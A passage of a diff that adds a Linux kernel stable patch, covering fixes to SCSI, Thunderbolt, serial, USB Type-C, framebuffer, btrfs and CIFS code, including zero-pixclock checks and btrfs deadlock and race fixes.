+--- a/drivers/scsi/megaraid/megaraid_sas_fusion.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+@@ -4768,7 +4768,7 @@ int megasas_task_abort_fusion(struct scsi_cmnd *scmd)
+ 	devhandle = megasas_get_tm_devhandle(scmd->device);
+ 
+ 	if (devhandle == (u16)ULONG_MAX) {
+-		ret = SUCCESS;
++		ret = FAILED;
+ 		sdev_printk(KERN_INFO, scmd->device,
+ 			"task abort issued for invalid devhandle\n");
+ 		mutex_unlock(&instance->reset_mutex);
+@@ -4838,7 +4838,7 @@ int megasas_reset_target_fusion(struct scsi_cmnd *scmd)
+ 	devhandle = megasas_get_tm_devhandle(scmd->device);
+ 
+ 	if (devhandle == (u16)ULONG_MAX) {
+-		ret = SUCCESS;
++		ret = FAILED;
+ 		sdev_printk(KERN_INFO, scmd->device,
+ 			"target reset issued for invalid devhandle\n");
+ 		mutex_unlock(&instance->reset_mutex);
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 2ee9ea57554d7..14ae0a9c5d3d8 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -6616,11 +6616,6 @@ _base_allocate_memory_pools(struct MPT3SAS_ADAPTER *ioc)
+ 	else if (rc == -EAGAIN)
+ 		goto try_32bit_dma;
+ 	total_sz += sense_sz;
+-	ioc_info(ioc,
+-	    "sense pool(0x%p)- dma(0x%llx): depth(%d),"
+-	    "element_size(%d), pool_size(%d kB)\n",
+-	    ioc->sense, (unsigned long long)ioc->sense_dma, ioc->scsiio_depth,
+-	    SCSI_SENSE_BUFFERSIZE, sz / 1024);
+ 	/* reply pool, 4 byte align */
+ 	sz = ioc->reply_free_queue_depth * ioc->reply_sz;
+ 	rc = _base_allocate_reply_pool(ioc, sz);
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index ae28a03fa890b..1157b8869bcca 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -26,6 +26,19 @@ static void quirk_clx_disable(struct tb_switch *sw)
+ 	tb_sw_dbg(sw, "disabling CL states\n");
+ }
+ 
++static void quirk_usb3_maximum_bandwidth(struct tb_switch *sw)
++{
++	struct tb_port *port;
++
++	tb_switch_for_each_port(sw, port) {
++		if (!tb_port_is_usb3_down(port))
++			continue;
++		port->max_bw = 16376;
++		tb_port_dbg(port, "USB3 maximum bandwidth limited to %u Mb/s\n",
++			    port->max_bw);
++	}
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -43,6 +56,24 @@ static const struct tb_quirk tb_quirks[] = {
+ 	 * DP buffers.
+ 	 */
+ 	{ 0x8087, 0x0b26, 0x0000, 0x0000, quirk_dp_credit_allocation },
++	/*
++	 * Limit the maximum USB3 bandwidth for the following Intel USB4
++	 * host routers due to a hardware issue.
++	 */
++	{ 0x8087, PCI_DEVICE_ID_INTEL_ADL_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_ADL_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_RPL_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_RPL_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_M_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
+ 	/*
+ 	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
+ 	 */
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index e11d973a8f9b6..f034723b1b40e 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -252,6 +252,8 @@ struct tb_switch {
+  * @ctl_credits: Buffers reserved for control path
+  * @dma_credits: Number of credits allocated for DMA tunneling for all
+  *		 DMA paths through this port.
++ * @max_bw: Maximum possible bandwidth through this adapter if set to
++ *	    non-zero.
+  *
+  * In USB4 terminology this structure represents an adapter (protocol or
+  * lane adapter).
+@@ -277,6 +279,7 @@ struct tb_port {
+ 	unsigned int total_credits;
+ 	unsigned int ctl_credits;
+ 	unsigned int dma_credits;
++	unsigned int max_bw;
+ };
+ 
+ /**
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index cf8d4f769579e..3c821f5e44814 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -1865,6 +1865,15 @@ int usb4_port_retimer_nvm_read(struct tb_port *port, u8 index,
+ 				usb4_port_retimer_nvm_read_block, &info);
+ }
+ 
++static inline unsigned int
++usb4_usb3_port_max_bandwidth(const struct tb_port *port, unsigned int bw)
++{
++	/* Take the possible bandwidth limitation into account */
++	if (port->max_bw)
++		return min(bw, port->max_bw);
++	return bw;
++}
++
+ /**
+  * usb4_usb3_port_max_link_rate() - Maximum support USB3 link rate
+  * @port: USB3 adapter port
+@@ -1886,7 +1895,9 @@ int usb4_usb3_port_max_link_rate(struct tb_port *port)
+ 		return ret;
+ 
+ 	lr = (val & ADP_USB3_CS_4_MSLR_MASK) >> ADP_USB3_CS_4_MSLR_SHIFT;
+-	return lr == ADP_USB3_CS_4_MSLR_20G ? 20000 : 10000;
++	ret = lr == ADP_USB3_CS_4_MSLR_20G ? 20000 : 10000;
++
++	return usb4_usb3_port_max_bandwidth(port, ret);
+ }
+ 
+ /**
+@@ -1913,7 +1924,9 @@ int usb4_usb3_port_actual_link_rate(struct tb_port *port)
+ 		return 0;
+ 
+ 	lr = val & ADP_USB3_CS_4_ALR_MASK;
+-	return lr == ADP_USB3_CS_4_ALR_20G ? 20000 : 10000;
++	ret = lr == ADP_USB3_CS_4_ALR_20G ? 20000 : 10000;
++
++	return usb4_usb3_port_max_bandwidth(port, ret);
+ }
+ 
+ static int usb4_usb3_port_cm_request(struct tb_port *port, bool request)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index c51883f34ac2b..cd98c04de0330 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -582,7 +582,7 @@ static void lpuart_flush_buffer(struct uart_port *port)
+ 				sport->dma_tx_nents, DMA_TO_DEVICE);
+ 			sport->dma_tx_in_progress = false;
+ 		}
+-		dmaengine_terminate_all(chan);
++		dmaengine_terminate_async(chan);
+ 	}
+ 
+ 	if (lpuart_is_32(sport)) {
+@@ -1333,7 +1333,8 @@ static void lpuart_dma_rx_free(struct uart_port *port)
+ 					struct lpuart_port, port);
+ 	struct dma_chan *chan = sport->dma_rx_chan;
+ 
+-	dmaengine_terminate_all(chan);
++	dmaengine_terminate_sync(chan);
++	del_timer_sync(&sport->lpuart_timer);
+ 	dma_unmap_sg(chan->device->dev, &sport->rx_sgl, 1, DMA_FROM_DEVICE);
+ 	kfree(sport->rx_ring.buf);
+ 	sport->rx_ring.tail = 0;
+@@ -1757,7 +1758,6 @@ static int lpuart32_startup(struct uart_port *port)
+ static void lpuart_dma_shutdown(struct lpuart_port *sport)
+ {
+ 	if (sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
+ 		lpuart_dma_rx_free(&sport->port);
+ 		sport->lpuart_dma_rx_use = false;
+ 	}
+@@ -1766,7 +1766,7 @@ static void lpuart_dma_shutdown(struct lpuart_port *sport)
+ 		if (wait_event_interruptible_timeout(sport->dma_wait,
+ 			!sport->dma_tx_in_progress, msecs_to_jiffies(300)) <= 0) {
+ 			sport->dma_tx_in_progress = false;
+-			dmaengine_terminate_all(sport->dma_tx_chan);
++			dmaengine_terminate_sync(sport->dma_tx_chan);
+ 		}
+ 		sport->lpuart_dma_tx_use = false;
+ 	}
+@@ -1917,10 +1917,8 @@ lpuart_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	 * Since timer function acqures sport->port.lock, need to stop before
+ 	 * acquring same lock because otherwise del_timer_sync() can deadlock.
+ 	 */
+-	if (old && sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
++	if (old && sport->lpuart_dma_rx_use)
+ 		lpuart_dma_rx_free(&sport->port);
+-	}
+ 
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+@@ -2154,10 +2152,8 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	 * Since timer function acqures sport->port.lock, need to stop before
+ 	 * acquring same lock because otherwise del_timer_sync() can deadlock.
+ 	 */
+-	if (old && sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
++	if (old && sport->lpuart_dma_rx_use)
+ 		lpuart_dma_rx_free(&sport->port);
+-	}
+ 
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+@@ -2850,7 +2846,6 @@ static int __maybe_unused lpuart_suspend(struct device *dev)
+ 		 * Rx DMA path before suspend and start Rx DMA path on resume.
+ 		 */
+ 		if (irq_wake) {
+-			del_timer_sync(&sport->lpuart_timer);
+ 			lpuart_dma_rx_free(&sport->port);
+ 		}
+ 
+@@ -2867,7 +2862,7 @@ static int __maybe_unused lpuart_suspend(struct device *dev)
+ 
+ 	if (sport->lpuart_dma_tx_use) {
+ 		sport->dma_tx_in_progress = false;
+-		dmaengine_terminate_all(sport->dma_tx_chan);
++		dmaengine_terminate_sync(sport->dma_tx_chan);
+ 	}
+ 
+ 	if (sport->port.suspended && !irq_wake)
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 8cbbb002fefe0..086b509689839 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1039,9 +1039,8 @@ static struct fwnode_handle *ucsi_find_fwnode(struct ucsi_connector *con)
+ 	return NULL;
+ }
+ 
+-static int ucsi_register_port(struct ucsi *ucsi, int index)
++static int ucsi_register_port(struct ucsi *ucsi, struct ucsi_connector *con)
+ {
+-	struct ucsi_connector *con = &ucsi->connector[index];
+ 	struct typec_capability *cap = &con->typec_cap;
+ 	enum typec_accessory *accessory = cap->accessory;
+ 	enum usb_role u_role = USB_ROLE_NONE;
+@@ -1062,7 +1061,6 @@ static int ucsi_register_port(struct ucsi *ucsi, int index)
+ 	init_completion(&con->complete);
+ 	mutex_init(&con->lock);
+ 	INIT_LIST_HEAD(&con->partner_tasks);
+-	con->num = index + 1;
+ 	con->ucsi = ucsi;
+ 
+ 	cap->fwnode = ucsi_find_fwnode(con);
+@@ -1204,7 +1202,7 @@ out_unlock:
+  */
+ static int ucsi_init(struct ucsi *ucsi)
+ {
+-	struct ucsi_connector *con;
++	struct ucsi_connector *con, *connector;
+ 	u64 command, ntfy;
+ 	int ret;
+ 	int i;
+@@ -1235,16 +1233,16 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Allocate the connectors. Released in ucsi_unregister() */
+-	ucsi->connector = kcalloc(ucsi->cap.num_connectors + 1,
+-				  sizeof(*ucsi->connector), GFP_KERNEL);
+-	if (!ucsi->connector) {
++	connector = kcalloc(ucsi->cap.num_connectors + 1, sizeof(*connector), GFP_KERNEL);
++	if (!connector) {
+ 		ret = -ENOMEM;
+ 		goto err_reset;
+ 	}
+ 
+ 	/* Register all connectors */
+ 	for (i = 0; i < ucsi->cap.num_connectors; i++) {
+-		ret = ucsi_register_port(ucsi, i);
++		connector[i].num = i + 1;
++		ret = ucsi_register_port(ucsi, &connector[i]);
+ 		if (ret)
+ 			goto err_unregister;
+ 	}
+@@ -1256,11 +1254,12 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	if (ret < 0)
+ 		goto err_unregister;
+ 
++	ucsi->connector = connector;
+ 	ucsi->ntfy = ntfy;
+ 	return 0;
+ 
+ err_unregister:
+-	for (con = ucsi->connector; con->port; con++) {
++	for (con = connector; con->port; con++) {
+ 		ucsi_unregister_partner(con);
+ 		ucsi_unregister_altmodes(con, UCSI_RECIPIENT_CON);
+ 		ucsi_unregister_port_psy(con);
+@@ -1269,10 +1268,7 @@ err_unregister:
+ 		typec_unregister_port(con->port);
+ 		con->port = NULL;
+ 	}
+-
+-	kfree(ucsi->connector);
+-	ucsi->connector = NULL;
+-
++	kfree(connector);
+ err_reset:
+ 	memset(&ucsi->cap, 0, sizeof(ucsi->cap));
+ 	ucsi_reset_ppm(ucsi);
+diff --git a/drivers/video/fbdev/au1200fb.c b/drivers/video/fbdev/au1200fb.c
+index 81c3154544287..b6b22fa4a8a01 100644
+--- a/drivers/video/fbdev/au1200fb.c
++++ b/drivers/video/fbdev/au1200fb.c
+@@ -1040,6 +1040,9 @@ static int au1200fb_fb_check_var(struct fb_var_screeninfo *var,
+ 	u32 pixclock;
+ 	int screen_size, plane;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	plane = fbdev->plane;
+ 
+ 	/* Make sure that the mode respect all LCD controller and
+diff --git a/drivers/video/fbdev/geode/lxfb_core.c b/drivers/video/fbdev/geode/lxfb_core.c
+index 9d26592dbfce9..41fda498406c1 100644
+--- a/drivers/video/fbdev/geode/lxfb_core.c
++++ b/drivers/video/fbdev/geode/lxfb_core.c
+@@ -235,6 +235,9 @@ static void get_modedb(struct fb_videomode **modedb, unsigned int *size)
+ 
+ static int lxfb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ {
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	if (var->xres > 1920 || var->yres > 1440)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/video/fbdev/intelfb/intelfbdrv.c b/drivers/video/fbdev/intelfb/intelfbdrv.c
+index d4a2891a9a7ac..a93dd531d00df 100644
+--- a/drivers/video/fbdev/intelfb/intelfbdrv.c
++++ b/drivers/video/fbdev/intelfb/intelfbdrv.c
+@@ -1219,6 +1219,9 @@ static int intelfb_check_var(struct fb_var_screeninfo *var,
+ 
+ 	dinfo = GET_DINFO(info);
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	/* update the pitch */
+ 	if (intelfbhw_validate_mode(dinfo, var) != 0)
+ 		return -EINVAL;
+diff --git a/drivers/video/fbdev/nvidia/nvidia.c b/drivers/video/fbdev/nvidia/nvidia.c
+index a6c3bc2222463..1b8904824ad83 100644
+--- a/drivers/video/fbdev/nvidia/nvidia.c
++++ b/drivers/video/fbdev/nvidia/nvidia.c
+@@ -764,6 +764,8 @@ static int nvidiafb_check_var(struct fb_var_screeninfo *var,
+ 	int pitch, err = 0;
+ 
+ 	NVTRACE_ENTER();
++	if (!var->pixclock)
++		return -EINVAL;
+ 
+ 	var->transp.offset = 0;
+ 	var->transp.length = 0;
+diff --git a/drivers/video/fbdev/tgafb.c b/drivers/video/fbdev/tgafb.c
+index 251dbd282f5ed..84d5daef97666 100644
+--- a/drivers/video/fbdev/tgafb.c
++++ b/drivers/video/fbdev/tgafb.c
+@@ -173,6 +173,9 @@ tgafb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ {
+ 	struct tga_par *par = (struct tga_par *)info->par;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	if (par->tga_type == TGA_TYPE_8PLANE) {
+ 		if (var->bits_per_pixel != 8)
+ 			return -EINVAL;
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 4b69945755e4f..f33ddd5922b8c 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -3259,13 +3259,15 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 	spin_unlock(&info->delalloc_root_lock);
+ 
+ 	while (total) {
+-		bool reclaim;
++		struct btrfs_space_info *space_info;
++		bool reclaim = false;
+ 
+ 		cache = btrfs_lookup_block_group(info, bytenr);
+ 		if (!cache) {
+ 			ret = -ENOENT;
+ 			break;
+ 		}
++		space_info = cache->space_info;
+ 		factor = btrfs_bg_type_to_factor(cache->flags);
+ 
+ 		/*
+@@ -3280,7 +3282,7 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 		byte_in_group = bytenr - cache->start;
+ 		WARN_ON(byte_in_group > cache->length);
+ 
+-		spin_lock(&cache->space_info->lock);
++		spin_lock(&space_info->lock);
+ 		spin_lock(&cache->lock);
+ 
+ 		if (btrfs_test_opt(info, SPACE_CACHE) &&
+@@ -3293,23 +3295,23 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 			old_val += num_bytes;
+ 			cache->used = old_val;
+ 			cache->reserved -= num_bytes;
+-			cache->space_info->bytes_reserved -= num_bytes;
+-			cache->space_info->bytes_used += num_bytes;
+-			cache->space_info->disk_used += num_bytes * factor;
++			space_info->bytes_reserved -= num_bytes;
++			space_info->bytes_used += num_bytes;
++			space_info->disk_used += num_bytes * factor;
+ 			spin_unlock(&cache->lock);
+-			spin_unlock(&cache->space_info->lock);
++			spin_unlock(&space_info->lock);
+ 		} else {
+ 			old_val -= num_bytes;
+ 			cache->used = old_val;
+ 			cache->pinned += num_bytes;
+-			btrfs_space_info_update_bytes_pinned(info,
+-					cache->space_info, num_bytes);
+-			cache->space_info->bytes_used -= num_bytes;
+-			cache->space_info->disk_used -= num_bytes * factor;
++			btrfs_space_info_update_bytes_pinned(info, space_info,
++							     num_bytes);
++			space_info->bytes_used -= num_bytes;
++			space_info->disk_used -= num_bytes * factor;
+ 
+ 			reclaim = should_reclaim_block_group(cache, num_bytes);
+ 			spin_unlock(&cache->lock);
+-			spin_unlock(&cache->space_info->lock);
++			spin_unlock(&space_info->lock);
+ 
+ 			set_extent_dirty(&trans->transaction->pinned_extents,
+ 					 bytenr, bytenr + num_bytes - 1,
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index a3febabacec04..3bcef0c4d6fc4 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -590,11 +590,8 @@ enum {
+ 	/* Indicate we have to finish a zone to do next allocation. */
+ 	BTRFS_FS_NEED_ZONE_FINISH,
+ 
+-	/*
+-	 * Indicate metadata over-commit is disabled. This is set when active
+-	 * zone tracking is needed.
+-	 */
+-	BTRFS_FS_NO_OVERCOMMIT,
++	/* This is set when active zone tracking is needed. */
++	BTRFS_FS_ACTIVE_ZONE_TRACKING,
+ 
+ #if BITS_PER_LONG == 32
+ 	/* Indicate if we have error/warn message printed on 32bit systems */
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index f4023651dd68b..6a8f2bd350f4b 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2684,8 +2684,13 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		bg_reclaim_threshold = READ_ONCE(sinfo->bg_reclaim_threshold);
+ 
+ 	spin_lock(&ctl->tree_lock);
++	/* Count initial region as zone_unusable until it gets activated. */
+ 	if (!used)
+ 		to_free = size;
++	else if (initial &&
++		 test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &block_group->fs_info->flags) &&
++		 (block_group->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM)))
++		to_free = 0;
+ 	else if (initial)
+ 		to_free = block_group->zone_capacity;
+ 	else if (offset >= block_group->alloc_offset)
+@@ -2713,7 +2718,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	reclaimable_unusable = block_group->zone_unusable -
+ 			       (block_group->length - block_group->zone_capacity);
+ 	/* All the region is now unusable. Mark it as unused and reclaim */
+-	if (block_group->zone_unusable == block_group->length) {
++	if (block_group->zone_unusable == block_group->length &&
++	    block_group->alloc_offset) {
+ 		btrfs_mark_bg_unused(block_group);
+ 	} else if (bg_reclaim_threshold &&
+ 		   reclaimable_unusable >=
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index c05f16a35bcaf..fe2fb81da46ba 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -4621,7 +4621,9 @@ static long btrfs_ioctl_qgroup_assign(struct file *file, void __user *arg)
+ 	}
+ 
+ 	/* update qgroup status and info */
++	mutex_lock(&fs_info->qgroup_ioctl_lock);
+ 	err = btrfs_run_qgroups(trans);
++	mutex_unlock(&fs_info->qgroup_ioctl_lock);
+ 	if (err < 0)
+ 		btrfs_handle_fs_error(fs_info, err,
+ 				      "failed to update qgroup status and info");
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index 5ac65384c9471..f8b0548988858 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2812,13 +2812,22 @@ cleanup:
+ }
+ 
+ /*
+- * called from commit_transaction. Writes all changed qgroups to disk.
++ * Writes all changed qgroups to disk.
++ * Called by the transaction commit path and the qgroup assign ioctl.
+  */
+ int btrfs_run_qgroups(struct btrfs_trans_handle *trans)
+ {
+ 	struct btrfs_fs_info *fs_info = trans->fs_info;
+ 	int ret = 0;
+ 
++	/*
++	 * In case we are called from the qgroup assign ioctl, assert that we
++	 * are holding the qgroup_ioctl_lock, otherwise we can race with a quota
++	 * disable operation (ioctl) and access a freed quota root.
++	 */
++	if (trans->transaction->state != TRANS_STATE_COMMIT_DOING)
++		lockdep_assert_held(&fs_info->qgroup_ioctl_lock);
++
+ 	if (!fs_info->quota_root)
+ 		return ret;
+ 
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index 65c010159fb5f..c7642c00a65d0 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -404,7 +404,7 @@ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 		return 0;
+ 
+ 	used = btrfs_space_info_used(space_info, true);
+-	if (test_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags) &&
++	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags) &&
+ 	    (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
+ 		avail = 0;
+ 	else
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index d1f1da6820fb0..682b463a7633a 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -2009,7 +2009,20 @@ static void cleanup_transaction(struct btrfs_trans_handle *trans, int err)
+ 
+ 	if (current->journal_info == trans)
+ 		current->journal_info = NULL;
+-	btrfs_scrub_cancel(fs_info);
++
++	/*
++	 * If relocation is running, we can't cancel scrub because that will
++	 * result in a deadlock. Before relocating a block group, relocation
++	 * pauses scrub, then starts and commits a transaction before unpausing
++	 * scrub. If the transaction commit is being done by the relocation
++	 * task or triggered by another task and the relocation task is waiting
++	 * for the commit, and we end up here due to an error in the commit
++	 * path, then calling btrfs_scrub_cancel() will deadlock, as we are
++	 * asking for scrub to stop while having it asked to be paused higher
++	 * above in relocation code.
++	 */
++	if (!test_bit(BTRFS_FS_RELOC_RUNNING, &fs_info->flags))
++		btrfs_scrub_cancel(fs_info);
+ 
+ 	kmem_cache_free(btrfs_trans_handle_cachep, trans);
+ }
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index f02b8cbd6ec41..67b2aa552d228 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -1379,8 +1379,17 @@ struct btrfs_device *btrfs_scan_one_device(const char *path, fmode_t flags,
+ 	 * So, we need to add a special mount option to scan for
+ 	 * later supers, using BTRFS_SUPER_MIRROR_MAX instead
+ 	 */
+-	flags |= FMODE_EXCL;
+ 
++	/*
++	 * Avoid using flags |= FMODE_EXCL here, as the systemd-udev may
++	 * initiate the device scan which may race with the user's mount
++	 * or mkfs command, resulting in failure.
++	 * Since the device scan is solely for reading purposes, there is
++	 * no need for FMODE_EXCL. Additionally, the devices are read again
++	 * during the mount process. It is ok to get some inconsistent
++	 * values temporarily, as the device paths of the fsid are the only
++	 * required information for assembling the volume.
++	 */
+ 	bdev = blkdev_get_by_path(path, flags, holder);
+ 	if (IS_ERR(bdev))
+ 		return ERR_CAST(bdev);
+@@ -3286,8 +3295,15 @@ int btrfs_relocate_chunk(struct btrfs_fs_info *fs_info, u64 chunk_offset)
+ 	btrfs_scrub_pause(fs_info);
+ 	ret = btrfs_relocate_block_group(fs_info, chunk_offset);
+ 	btrfs_scrub_continue(fs_info);
+-	if (ret)
++	if (ret) {
++		/*
++		 * If we had a transaction abort, stop all running scrubs.
++		 * See transaction.c:cleanup_transaction() why we do it here.
++		 */
++		if (BTRFS_FS_ERROR(fs_info))
++			btrfs_scrub_cancel(fs_info);
+ 		return ret;
++	}
+ 
+ 	block_group = btrfs_lookup_block_group(fs_info, chunk_offset);
+ 	if (!block_group)
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 1b72004136ef8..e97c5a1ac95d6 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -538,8 +538,7 @@ int btrfs_get_dev_zone_info(struct btrfs_device *device, bool populate_cache)
+ 		}
+ 		atomic_set(&zone_info->active_zones_left,
+ 			   max_active_zones - nactive);
+-		/* Overcommit does not work well with active zone tacking. */
+-		set_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags);
++		set_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags);
+ 	}
+ 
+ 	/* Validate superblock log */
+@@ -1576,9 +1575,19 @@ void btrfs_calc_zone_unusable(struct btrfs_block_group *cache)
+ 		return;
+ 
+ 	WARN_ON(cache->bytes_super != 0);
+-	unusable = (cache->alloc_offset - cache->used) +
+-		   (cache->length - cache->zone_capacity);
+-	free = cache->zone_capacity - cache->alloc_offset;
++
++	/* Check for block groups that never get activated */
++	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &cache->fs_info->flags) &&
++	    cache->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM) &&
++	    !test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &cache->runtime_flags) &&
++	    cache->alloc_offset == 0) {
++		unusable = cache->length;
++		free = 0;
++	} else {
++		unusable = (cache->alloc_offset - cache->used) +
++			   (cache->length - cache->zone_capacity);
++		free = cache->zone_capacity - cache->alloc_offset;
++	}
+ 
+ 	/* We only need ->free_space in ALLOC_SEQ block groups */
+ 	cache->cached = BTRFS_CACHE_FINISHED;
+@@ -1915,7 +1924,11 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ 	/* Successfully activated all the zones */
+ 	set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags);
+-	space_info->active_total_bytes += block_group->length;
++	WARN_ON(block_group->alloc_offset != 0);
++	if (block_group->zone_unusable == block_group->length) {
++		block_group->zone_unusable = block_group->length - block_group->zone_capacity;
++		space_info->bytes_zone_unusable -= block_group->zone_capacity;
++	}
+ 	spin_unlock(&block_group->lock);
+ 	btrfs_try_granting_tickets(fs_info, space_info);
+ 	spin_unlock(&space_info->lock);
+@@ -2278,7 +2291,7 @@ int btrfs_zone_finish_one_bg(struct btrfs_fs_info *fs_info)
+ 		u64 avail;
+ 
+ 		spin_lock(&block_group->lock);
+-		if (block_group->reserved ||
++		if (block_group->reserved || block_group->alloc_offset == 0 ||
+ 		    (block_group->flags & BTRFS_BLOCK_GROUP_SYSTEM)) {
+ 			spin_unlock(&block_group->lock);
+ 			continue;
+diff --git a/fs/cifs/cifsfs.h b/fs/cifs/cifsfs.h
+index 388b745a978e2..b6c38896fb2db 100644
+--- a/fs/cifs/cifsfs.h
++++ b/fs/cifs/cifsfs.h
+@@ -118,7 +118,10 @@ extern const struct dentry_operations cifs_ci_dentry_ops;
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ extern struct vfsmount *cifs_dfs_d_automount(struct path *path);
+ #else
+-#define cifs_dfs_d_automount NULL
++static inline struct vfsmount *cifs_dfs_d_automount(struct path *path)
++{
++	return ERR_PTR(-EREMOTE);
++}
+ #endif
+ 
+ /* Functions related to symlinks */
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index bc4475f6c0827..98513f5af3f96 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -691,5 +691,6 @@ static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+ 
+ struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+ void cifs_put_tcon_super(struct super_block *sb);
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+ 
+ #endif			/* _CIFSPROTO_H */
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 6c6a7fc47f3e3..c90d4ec9292ca 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -70,7 +70,6 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 	struct cifs_ses *ses;
+ 	struct TCP_Server_Info *server;
+ 	struct nls_table *nls_codepage;
